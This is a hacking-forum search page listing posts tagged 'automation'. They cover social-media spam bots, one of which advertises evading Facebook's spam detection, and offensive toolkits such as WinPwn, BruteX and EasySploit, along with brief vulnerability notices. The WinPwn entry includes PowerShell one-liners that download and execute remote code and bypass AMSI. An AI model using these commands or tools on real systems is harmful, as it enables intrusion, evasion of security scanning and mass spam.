Search the Community

Showing results for tags 'automation'.

The search index is currently processing. Current results may not be complete.


More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Staff Control
    • Staff Announcements
    • Moderators
    • Administration
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Cracking Zone
  • Security & Anonymity
  • Operating Systems | Hardware | Programs
  • Graphic Design
  • vBCms Comments
  • live stream tv
  • Marketplace
  • Premium Accounts
  • Modders Section
  • PRIV8-Section
  • Cracking Zone PRIV8
  • Carding Zone PRIV8

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me


Location


Interests


Occupation


TeamViewer


Twitter


Facebook


Youtube


Google+


Tox

Found 20 results

  1. [Hidden Content]
  2. Now you can chat without touching your device and chat with your customers directly from the browser. Send emoji, receive messages, posts, stories, videos and any type of attachments! Send messages to yours followers or any list of users! Automate your daily routine and enjoy your SMM strategy. DM Pilot is intended for the SMM manager or any owner of the page on Instagram who wants to send messages to his new followers, unfollowers, following or even unfollowing automatically. Demo: [Hidden Content] [Hidden Content]
  3. Automatically post images and textual messages on Facebook groups or on your wall with the help of this lightweight and efficient application [FEATURES LIST] - Easy to fetch your groups list, friends list, pages ... - Searching for groups by keyword, checking for status (joined, un-join, privacy open-close-secret group, members count, notify ...). - Easy to filter groups list. Join to any groups that you want. Leave bad groups (no more members, do not allow to post ...) by one click. Turn on/off notify from groups which you want. - Mass invite friends to group. Mass invite users via email to group - Post a message, single photo, multi-photos or sale post to groups which you chosed. You can also post your photo album to groups. - Post a video or video include photos to groups, friend's wall, pages, your wall. - Live stream on Facebook from more video source (file, facebook video link, youtube link, capture screen). - Schedule to live a stream automatic. - Share a facebook post to everywhere (groups, pages, friend wall, your wall) - Auto reply private message for your facebook personal account or facebook fan page - ONLY AVAILABLE ON FACEBOOK AUTOMATION - Auto reply to comments by specific keyword or send a private message to users who comment on your post - ONLY AVAILABLE ON FACEBOOK AUTOMATION - Auto accept friend requests and add them to your groups or invite to like your page ONLY AVAILABLE ON FACEBOOK AUTOMATION - Auto interaction on your home feed, group feed, page feed or user's wall - ONLY AVAILABLE ON FACEBOOK AUTOMATION - Autoo Poke friend, auto happy birthday to friend. Increase interaction for your account. - Mass or single add your account with more options: Login with browser, Facebook App (Android or IOS app) Token, Cookies ONLY AVAILABLE ON FACEBOOK AUTOMATION - Tag specify friends to a post or random tag friends to a post. - Post a message, single photo or multi-photos to your wall or friend wall. - Send mass private message to users which you chosed. - RANDOM/SPIN your message, link, images, photo ... while posting for prevent spam detection by facebook. - Add a Sale Post to Groups - ONLY AVAILABLE ON FACEBOOK AUTOMATION - Sharing a your photo album/post to groups/pages/users ... - Searching for users by keyword, automatic sending friend request to users which you chosed. Get friend requests, accept or deny requests. - Convert users id to facebook emails. - Searching for pages by keyword, checking for details of these pages (likes count, can post, website, email, phone, country ...). Mass invite friend like the page. More filter options for you. - Export emails, phone, website from public pages. - Post a message, single photo, private message to public pages which you chosed. - Bump your posts in groups or bump specify posts ids. - Searching for events. Attending to events which you chosed. Mass invite friends to event. - Post a message, single photo to events which you chosed. - Schedule your posts to anywhere (groups, public pages, friend wall, private message, comment). - Schedule bumping your posts in groups or specify posts ids. - Schedule joining to groups. - Settings time interval while posting, joining to groups, friend request sending ... Prevent spam detection from facebook. - Easy to manage multi-facebook accounts. Proxy support for each account. Simple to post for specify account which you chosed. - Portable software, you do not need install to run it. [Hidden Content] [Hidden Content]
  4. Contains : Ninjagram, Massplanner, Jarvee, GMT2 and a simple automation tool on github LINK:-[Hidden Content]
  5. Jok3r v3 Network & Web Pentest Automation Framework About Overview Jok3r is a framework that aids penetration testers for network infrastructure and web security assessments. Its goal is to automate as much stuff as possible in order to quickly identify and exploit "low-hanging fruits" and "quick win" vulnerabilities on most common TCP/UDP services and most common web technologies (servers, CMS, languages...). Combine Pentest Tools Do not re-invent the wheel. Combine the most useful hacking tools/scripts available out there from various sources, in an automatic way. Automate Attacks Automatically run security checks adapted to the targeted services. Reconnaissance, CVE lookup, vulnerability scanning, exploitation, bruteforce... Centralize Mission Data Store data related to targets in a local database. Keep track of all the results from security checks and continuously update the database. Features Key Features Pentest Toolbox Management Selection of Tools Compilation of 50+ open-source tools & scripts, from various sources. Docker-based Application packaged in a Docker image running Kali OS, available on Docker Hub. Ready-to-use All tools and dependencies installed, just pull the Docker image and run a fresh container. Updates made easy Easily keep the whole toolbox up-to-date by running only one command. Easy Customization Easily add/remove tools from a simple configuration file. Network Infrastructure Security Assessment Many supported Services Target most common TCP/UDP services (HTTP, FTP, SSH, SMB, Oracle, MS-SQL, MySQL, PostgreSQL, VNC, etc.). Combine Power of Tools Each security check is performed by a tool from the toolbox. Attacks are performed by chaining security checks. Context Awareness Security checks to run are selected and adapted according to the context of the target (i.e. detected technologies, credentials, vulnerabilities, etc.). Reconnaissance Automatic fingerprinting (product detection) of targeted services is performed. CVE Lookup When product names and their versions are detected, a vulnerability lookup is performed on online CVE databases (using Vulners & CVE Details). Vulnerability Scanning Automatically check for common vulnerabilities and attempt to perform some exploitations (auto-pwn). Brute-force Attack Automatically check for default/common credentials on the service and perform dictionnary attack if necessary. Wordlists are optimized according to the targeted services. Post-authentication Testing Automatically perform some post-exploitation checks when valid credentials have been found. Web Security Assessment Large Focus on HTTP More than 60 different security checks targeting HTTP supported for now. Web Technologies Detection Fingerprinting engine based on Wappalyzer is run prior to security checks, allowing to detect: Programming language, Framework, JS library, CMS, Web & Application Server. Server Exploitation Automatically scan and/or exploit most critical vulnerabilities (e.g. RCE) on web and application servers (e.g. JBoss, Tomcat, Weblogic, Websphere, Jenkins, etc.). CMS Vulnerability Scanning Automatically run vulnerability scanners on most common CMS (Wordpress, Drupal, Joomla, etc.). Local Database & Reporting Local Database Data related to targets is organized by missions (workspaces) into a local Sqlite database that is kept updated during security testings. Metasploit-like Interactive Shell Access the database through an interactive shell with several built-in commands. Import Targets from Nmap Add targets to a mission either manually or by loading Nmap results. Access all Results All outputs from security checks, detected credentials and vulnerabilities are stored into the database and can be accessed easily. Reporting Generate full HTML reports with targets summary, web screenshots and all results from security testing. Architecture Framework Architecture General Architecture graph Flowchart Demo Demonstration Videos Download Get Jok3r Jok3r is open-source. Contributions, ideas and bug reports are welcome ! [Hide] [Hidden Content]]
  6. Autobot is an Instagram autmoation bot that offers dozens of features and functionalities. It saves your time by helping you get more done. Even if you’re not on your computer, you could share your stories and posts easily. Increase your sales. Get real results in no time. Get maximum performance from your automations thanks to its high end filtering features. Save time and effort with Autobot. [Hidden Content] [HIDE][Hidden Content]]
  7. Automation for internal Windows Penetration Testing. 1) Automatic Proxy Detection 2) Elevated or unelevated Detection 3) Forensic Mode oder Pentest Mode a. Forensik -> Loki + PSRECON + Todo: Threathunting functions b. Pentest -> Internal Windows Domain System i. Inveigh NBNS/SMB/HTTPS Spoofing ii. Local Reconing -> Hostenum, SessionGopher, FileSearch, PSRecon iii. Domain Reconing -> GetExploitableSystems, Powerview functions, ACL-Analysis, ADRecon 1) Todo: Grouper for Group Policy overview iv. Privilege Escalation -> Powersploit (Allchecks), GPP-Passwords, MS-Exploit Search (Sherlock), WCMDump, JAWS v. Lazagne Password recovery vi. Exploitation -> Kerberoasting, Mimikittenz, Mimikatz with Admin-rights vii. LateralMovement -> FindLocalAdminAccess 1) Invoke-MassMimikatz || Powershell Empire Remote Launcher Execution over WMI 2) DomainPasswordspray viii. Share Enumeration ix. FindGPOLocation –> Search for user/group rights x. Find-Fruit Changelog v1.1 This version contains mainly new features. The execution of various C# binaries in memory, GPO audit functions, various new local recon checks, and domain checks. Just Import the Modules with: Import-Module .\WinPwn.ps1 or iex (new-object net.webclient).downloadstring(‘[Hidden Content]) For AMSI Bypass use the following oneliner: iex (new-object net.webclient).downloadstring(‘[Hidden Content]) [HIDE][Hidden Content]]
  8. No coding experience necessary. This guide shows you how to automate instagram likes, follows, and comments across 25 accounts for free. You can use this for easy guerrilla marketing, growing your small business from cold start on auto-pilot, or for spreading any other message. I’ve combined all the best bots you can build here to grow up to 50–200 followers per day. It only takes about 15 minutes to copy these commands into google cloud servers and run the bot. [Hidden Content]
  9. Blue Prism Robotic Process Automation (RPA) versions prior to 6.5.0.12573 suffer from a privilege escalation vulnerability. View the full article
  10. Brutex is a shell based open source tool to make your work faster. It combines the power of Nmap, Hydra and DNSenum. This tool will automatically run an nmap scan to your target and then it will brute force all the open services for you, such as FTP, SSH and more using Hydra. BruteX ABOUT: Automatically brute force all services running on a target Open ports Usernames Passwords INSTALL: ./install.sh USAGE: brutex target <port> DOCKER: docker build -t brutex . docker run -it brutex target <port> DEMO VIDEO: Download: [HIDE][Hidden Content]]
  11. EasySploit v3.1 (Linux) - Metasploit automation (EASIER and FASTER than EVER) Options: (1) Windows --> test.exe (payload and listener) (2) Android --> test.apk (payload and listener) (3) Linux --> test.py (payload and listener) (4) MacOS --> test.jar (payload and listener) (5) Web --> test.php (payload and listener) (6) Scan if a target is vulnerable to ms17_010 (7) Exploit Windows 7/2008 x64 ONLY by IP (ms17_010_eternalblue) (8) Exploit Windows Vista/XP/2000/2003 ONLY by IP (ms17_010_psexec) (9) Exploit Windows with a link (HTA Server) (10) Contact with me - My accounts [Hidden Content]
  12. PRETty "PRinter Exploitation Toolkit" LAN automation tool PRETty is useful when a large number of printers are present on a network. Instead of scanning, logging, and manually running PRET againt each individual printer, PRETty will automatically discover and run choosen PRET payloads against all printers on the target network. Additionally, PRETty can be used to automate command/payload delivery to any given list of printers (See the "Lists" section) Download: [HIDE]. [Hidden Content]]
  13. itsMe

    Whatsapp Automation

    Whatsapp Automation for sending and recieving messages Whatsapp Automation is a collection of APIs that interact with WhatsApp messenger running in an Android emulator, allowing developers to build projects that automate sending and receiving messages, adding new contacts and broadcasting messages multiple contacts. The project uses Selinium, Appium, Python and Android Virtual Device Emulator. Demo Video.. [Hidden Content] Requirements: java Android Studio & Android Emulator setup with latest Android version Appium Server to interact with Emulator python environment for running Flask RabbitMQ for maintaining queue system for incoming requests [HIDE][Hidden Content]]
  14. The BMC Network Automation allows authenticated users to hijack established remote sessions of other users, version v8.7.00.000 b383 u038 was confirmed to be vulnerable. View the full article
  15. Rockwell Automation Allen-Bradley 1752-EN2T/C and 1769-L33ER/A LOGIX5333ER suffer from a cross site scripting vulnerability. View the full article
  16. Rockwell Automation Allen-Bradley PowerMonitor 1000 suffers from an incorrect access control that can allow for authentication bypass. View the full article
  17. Rockwell Automation Allen-Bradley PowerMonitor 1000 suffers from a cross site scripting vulnerability. View the full article
  18. Delta Electronics Delta Industrial Automation COMMGR versions 1.08 and below suffer from a buffer overflow vulnerability. View the full article
  19. This Metasploit module exploits a stack based buffer overflow in Delta Electronics Delta Industrial Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially crafted packets. This Metasploit module has been tested successfully on Delta Electronics Delta Industrial Automation COMMGR 1.08 over Windows XP SP3, Windows 7 SP1, and Windows 8.1. View the full article
  20. CA Release Automation NiMi version 6.5 suffers from a remote command execution vulnerability. View the full article